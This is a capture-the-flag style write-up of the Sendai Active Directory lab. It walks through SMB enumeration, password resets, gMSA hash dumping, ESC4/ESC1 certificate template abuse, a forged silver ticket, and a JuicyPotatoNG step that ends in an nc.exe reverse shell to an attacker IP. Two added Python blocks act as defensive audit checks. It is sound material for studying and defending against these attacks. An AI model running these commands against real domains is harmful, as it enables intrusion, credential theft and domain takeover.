Sendai involved enumerating usernames through SMB shares, finding accounts whose passwords had expired and resetting them. One of those users belonged to the Support group, which had GenericAll on the ADMSVC group, which in turn had ReadGMSAPassword on MGTSVC$. Enumerating the system then turned up clifford's password; clifford was part of the ca-operators group, which had full control over the SendaiComputer template, making it vulnerable to ESC4. Changing the template configuration made it vulnerable to ESC1, which led to domain admin.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: DNS:dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Supported Methods: GET
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-04T16:24:01
| Not valid after: 2024-11-03T16:24:01
| MD5: 6198fc32527e478294e38fd5c6a2b81e
|_SHA-1: 73b4d1026b49e0cb9c0d633982377e74f32b7db3
|_ssl-date: 2024-05-05T16:28:56+00:00; -1m22s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open unknown
56740/tcp open unknown
56744/tcp open unknown
PORT 80/443
Running gobuster, we can find /service.
However, this endpoint shows that we don't have access to it.
PORT 445
Enumerating SMB shares with anonymous login, we'll see the config, sendai and Users shares. config was not accessible and Users didn't contain anything, but sendai had some interesting files.
The incident file talked about users having weak passwords: all users will be prompted to change their password on logging in. The transfer directory had the users' directories.
Resetting domain user’s password
These users can also be enumerated through lookupsid by brute-forcing SIDs.
On trying to log in with a null password, we'll get two users whose password must be changed.
The password can be changed with impacket-smbpasswd:
impacket-smbpasswd sendai.vl/Thomas.Powell@dc.sendai.vl -newpass '$aduwu123'
From the config share, we can grab the .sqlconfig file, which has credentials for MSSQL.
But this service isn't exposed to us, so we move on to enumerating the domain with BloodHound:
python3 bloodhound.py -u sqlsvc -p password -d sendai.vl -c all -dc dc.sendai.vl -ns 10.10.104.41
Thomas.Powell is a member of the Support group, which has GenericAll on the ADMSVC group, which in turn has ReadGMSAPassword on the MGTSVC$ account. We'll need to add thomas to the ADMSVC group and then read the NT hash of the MGTSVC$ account.
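As an added audit example (not code from the writeup or from BloodHound), the check below walks a BloodHound-style edge list backwards from a gMSA and reports every principal that can end up reading its managed password through nested membership or GenericAll over a group, which is exactly the Support -> ADMSVC -> MGTSVC$ chain above. The edge list, the DC$ entry and the extra sample user are constructed for the example.

```python
from collections import deque

# Constructed BloodHound-style edges (source, relation, target) mirroring the chain in the
# writeup. The DC$ reader and SAMPLE.USER are assumptions added for illustration.
EDGES = [
    ("THOMAS.POWELL@SENDAI.VL", "MemberOf", "SUPPORT@SENDAI.VL"),
    ("SUPPORT@SENDAI.VL", "GenericAll", "ADMSVC@SENDAI.VL"),
    ("ADMSVC@SENDAI.VL", "ReadGMSAPassword", "MGTSVC$@SENDAI.VL"),
    ("DC$@SENDAI.VL", "ReadGMSAPassword", "MGTSVC$@SENDAI.VL"),
    ("SAMPLE.USER@SENDAI.VL", "MemberOf", "DOMAIN USERS@SENDAI.VL"),
]

# Relations along which control flows toward the gMSA: a member inherits its group's
# rights, and GenericAll/WriteDacl/WriteOwner/AddMember over a group lets the holder
# become a member. GenericAll over the gMSA itself allows rewriting its reader list.
TRAVERSABLE = {"MemberOf", "GenericAll", "WriteDacl", "WriteOwner", "AddMember", "ReadGMSAPassword"}


def gmsa_readers(edges, gmsa):
    """Map every principal that can reach the gMSA's password to its edge path."""
    reverse = {}  # target -> [(source, relation)]
    for src, rel, dst in edges:
        if rel in TRAVERSABLE:
            reverse.setdefault(dst, []).append((src, rel))
    paths = {gmsa: []}
    queue = deque([gmsa])
    while queue:  # breadth-first search backwards from the gMSA
        node = queue.popleft()
        for src, rel in reverse.get(node, []):
            if src not in paths:
                paths[src] = [(src, rel, node)] + paths[node]
                queue.append(src)
    del paths[gmsa]
    return paths


def unexpected_readers(edges, gmsa, allowed):
    """Readers that are not on the allow-list of principals meant to use the gMSA."""
    return {p: path for p, path in gmsa_readers(edges, gmsa).items() if p not in allowed}


if __name__ == "__main__":
    allowed = {"ADMSVC@SENDAI.VL", "DC$@SENDAI.VL"}
    for principal, path in unexpected_readers(EDGES, "MGTSVC$@SENDAI.VL", allowed).items():
        print(principal, "->", " -> ".join(f"{s} [{r}] {d}" for s, r, d in path))
```

On this data the allow-list leaves Support and Thomas.Powell flagged, each with the full path that explains why; the fix is to remove the GenericAll grant on ADMSVC rather than to change the gMSA itself.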
Abusing GenericAll and reading GMSA password
Through bloodyAD we can add thomas to the ADMSVC group using the GenericAll rights:
python3 bloodyAD.py --host "10.10.104.41" -d 'sendai.vl' -u 'thomas.powell' -p '$aduwu123' add groupMember ADMSVC thomas.powell
With the gMSADumper script, or with NetExec, we can dump the NT hash of the mgtsvc account:
python3 gMSADumper.py -u 'thomas.powell' -p '$aduwu123' -d sendai.vl -l 10.10.104.41
This account can log in on the DC as it's part of the Remote Management group.
Checking the privileges after logging in through evil-winrm, it doesn't have any privilege that we can abuse to get local admin.
Obtaining clifford’s password
Among the running processes we have helpdesk, which doesn't normally run on a system.
Enumerating the system with PrivescCheck.ps1 lists the running processes with their command lines, and that is where we'll find clifford.davey's creds.
Enumerating ADCS
This user belongs to the CA-Operators group, so he will likely be able to enroll in a custom template; we enumerate templates with certipy.
Escalating privileges through ESC4
certipy find -u clifford.davey -vulnerable -target dc.sendai.vl -dc-ip 10.10.115.126 -stdout
This lists a template, SendaiComputer, whose EKU is set to Client Authentication, so a certificate issued from it can be used to authenticate to the domain. The ca-operators group has full control over this template, which means we can edit the template and then impersonate the domain admin. This is known as ESC4 (access control) abuse.
With certipy, we can change the configuration of this template to allow domain users to enroll in it and supply an arbitrary subject, i.e. impersonate any user (ESC1):
certipy template -u clifford.davey -target dc.sendai.vl -dc-ip 10.10.115.126 -template SendaiComputer
certipy req -u 'clifford.davey' -ca 'sendai-DC-CA' -dc-ip 10.10.115.126 -target dc.sendai.vl -template 'SendaiComputer' -upn administrator
certipy auth -pfx ./administrator.pfx -domain sendai.vl
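The same two conditions can be checked from the defender's side. The added example below (not code from the writeup or from certipy) classifies a template record for ESC4 (write rights held outside the trusted set) and ESC1 (low-privilege enrollment, enrollee-supplied subject, an authentication EKU, no manager approval and no required signatures). The field names follow the LDAP attribute semantics and both SendaiComputer records are constructed to show the state before and after the certipy template change.

```python
# Added example, not from the writeup or certipy. Field names mirror the LDAP attributes;
# the two template records below are constructed before/after states for SendaiComputer.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # bit in msPKI-Enrollment-Flag (manager approval)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
PRIVILEGED = {"Domain Admins", "Enterprise Admins", "Administrators"}  # assumed trusted set
LOW_PRIV = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}


def check_template(t):
    """Return a list of (finding, principals) tuples for one template record."""
    findings = []
    # ESC4: owner/DACL/property write rights on the template held outside the trusted set
    writers = set(t["write_principals"]) - PRIVILEGED
    if writers:
        findings.append(("ESC4", sorted(writers)))
    # ESC1: low-priv enrollment + enrollee-supplied SAN + auth EKU + no approval/signatures
    enrollers = set(t["enroll_principals"]) & LOW_PRIV
    if (enrollers
            and t["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
            and (not t["ekus"] or set(t["ekus"]) & AUTH_EKUS)  # no EKU means any purpose
            and not t["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS
            and t["ra_signature"] == 0):
        findings.append(("ESC1", sorted(enrollers)))
    return findings


# Constructed "as found" state: ca-operators can edit the template, but subject is CA-built.
SENDAI_BEFORE = {
    "name": "SendaiComputer", "name_flag": 0, "enrollment_flag": 0, "ra_signature": 0,
    "ekus": ["1.3.6.1.5.5.7.3.2"],
    "enroll_principals": ["ca-operators"],
    "write_principals": ["ca-operators", "Domain Admins"],
}
# Constructed state after the template was rewritten to let domain users enroll with their own SAN.
SENDAI_AFTER = dict(SENDAI_BEFORE, name_flag=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
                    enroll_principals=["Domain Users", "ca-operators"])

if __name__ == "__main__":
    for record in (SENDAI_BEFORE, SENDAI_AFTER):
        print(record["name"], check_template(record))
```

The ESC4 finding is present in both states, which is the point: the write grant to ca-operators is the root cause, and monitoring template object modifications (or removing that grant) catches the problem before any ESC1 condition appears.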
Escalating with SeImpersonate privilege
Another way of escalating privileges is through MSSQL. Since MSSQL is running internally and we already have access to the machine, we can port forward with chisel:
chisel server -p 2222 --reverse
chisel.exe client 10.8.0.136:2222 R:socks
But we'll get login denied for the sqlsvc account.
With ticketer, we can forge a silver ticket for accessing the MSSQL service as an administrator:
ticketer.py -domain-sid S-1-5-21-3085872742-570972823-736764132 -domain sendai.vl -spn MSSQL/dc.sendai.vl -nthash hash Administrator
Enabling xp_cmdshell will allow us to execute system commands as sqlsvc.
The difference here is that we'll have the SeImpersonate privilege, which we can abuse to get local admin.
Using JuicyPotatoNG to abuse the privilege and get a shell as SYSTEM:
.\JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Users\sqlsvc\nc.exe 10.8.0.136 4444 -e cmd.exe"